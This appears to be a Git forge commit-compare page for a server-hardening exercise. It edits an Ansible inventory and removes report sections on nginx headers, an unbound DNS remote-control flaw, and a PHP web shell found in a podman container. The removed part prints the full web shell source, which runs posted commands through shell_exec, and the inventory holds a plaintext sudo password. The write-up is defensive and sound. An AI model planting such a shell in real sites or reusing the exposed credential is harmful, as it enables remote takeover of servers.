spanskiduh
/
ls-2024-selection
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: spanskiduh:0c57c12ac8ae59509a43fa53a14e4c553cdecc0e
Branches Tags
spanskiduh:master
..
compare: spanskiduh:512acb8db3ce6321eb797a7471b5fa9903b7b9de
Branches Tags
spanskiduh:master

No commits in common. "0c57c12ac8ae59509a43fa53a14e4c553cdecc0e" and "512acb8db3ce6321eb797a7471b5fa9903b7b9de" have entirely different histories.
0c57c12ac8 ... 512acb8db3

2 changed files with 4 additions and 108 deletions
Show Stats Expand all files Collapse all files

7
ansible/inventory.yml
View File

@ -5,6 +5,7 @@ all:
ansible_connection: ssh
ansible_become: yes
ansible_become_method: sudo
ansible_host: 64.227.120.192
ansible_ssh_user: root
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
ansible_host: ml-node
ansible_ssh_user: ml-node
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
ansible_become_pass: dobercaj420

105
report/Report.md
View File

@ -274,90 +274,6 @@ server {
```
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
Lets enable xss protection in the nginx configuration.
```bash
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
```
And deny access to the all `.` files.
```bash
location ~ /\. {
deny all;
}
```
The process is run by the `conmon` process.
```bash
root@ls-2024-9:~# sudo lsof -i :8018
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
```
It is a podman container.
```bash
root@ls-2024-9:~# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
root@ls-2024-9:~#
```
When going into the container we can see the php reverse shell script.
```bash
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
root@4d05d4a1a404:/var/www/html# ls
app.js assets index.html manifest.json service-worker.js shell.php style.css
root@4d05d4a1a404:/var/www/html# cat shell.php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>CMD</title>
<style type="text/css">
body {
background: black;
font-family: courier,arial;
color: white;
}
</style>
</head>
<body>
<br/><br/><br/>
<center>
<form method="POST">
<input type="text" name="cmd" placeholder="cmd" size=100/>
<input type="submit" value="exec"/>
</form>
</center>
<br/><br/><br/>
<?php
if(isset($_POST['cmd'])){
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
}
?>
</body>
root@4d05d4a1a404:/var/www/html#
```
Lets remove the file now.
```bash
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
```
### Already f-up something
@ -462,24 +378,3 @@ Host ls2024_prep
### DNS
Problem here is that remote control is enabled and we can use it to get the root shell.
```txt
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
# default unbound control
remote-control:
control-enable: yes
control-interface: ::0
control-use-cert: no
```
Lets disable remote control completely. and restart the service.
```bash
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
```
This is all I found suspicious in the DNS configuration.